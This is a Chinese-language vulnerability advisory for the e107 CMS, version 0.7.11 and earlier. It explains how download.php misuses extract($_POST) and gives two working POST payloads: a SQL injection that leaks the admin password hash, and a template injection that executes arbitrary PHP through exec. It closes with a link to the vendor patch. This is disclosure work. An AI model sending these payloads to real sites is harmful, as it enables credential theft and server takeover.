发布日期：2008-08-07
更新日期：2008-08-08

受影响系统：

e107.org e107 website system <= 0.7.11

描述：

---

BUGTRAQ  ID: 30601

e107是用php编写的内容管理系统。

e107的download.php文件没有安全的使用extract()函数，在文件的85到86行：

case 'list' :    // Category-based listing
if (isset($_POST['view'])) extract($_POST);

可见攻击者可以覆盖任意声明的变量。如果用户张贴了以下内容的话：

view=1&id=-99') UNION SELECT concat(user_name,char(58), user_password),
2,3,4 FROM e107_user WHERE user_id=1/*

由于页面标题中会显示用户名和口令哈希，因此可能通过发送POST请求下载目录视图页面（download.php?list.1）。无需将magic quotes设置为默认的off就可以利用这个漏洞。

此外如果用户发送了以下post请求的话：

view=1&action=maincats&execute=aWQ=&template_load_core=echo%20exec
(base64_decode($_POST[execute]));

还可以注入并执行任意php代码。

<*来源：James Bercegay （security@gulftech.org）
  
  链接：http://marc.info/?l=bugtraq&m=121814507611510&w=2
        http://secunia.com/advisories/31394/
*>

建议：

---

厂商补丁：

e107.org
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://e107.cvs.sourceforge.net/e107/e107_0.7/download.php?r1=1.95&r2=1.96&view=patch&pathrev=MAIN

浏览次数：3326
严重程度：0（网友投票）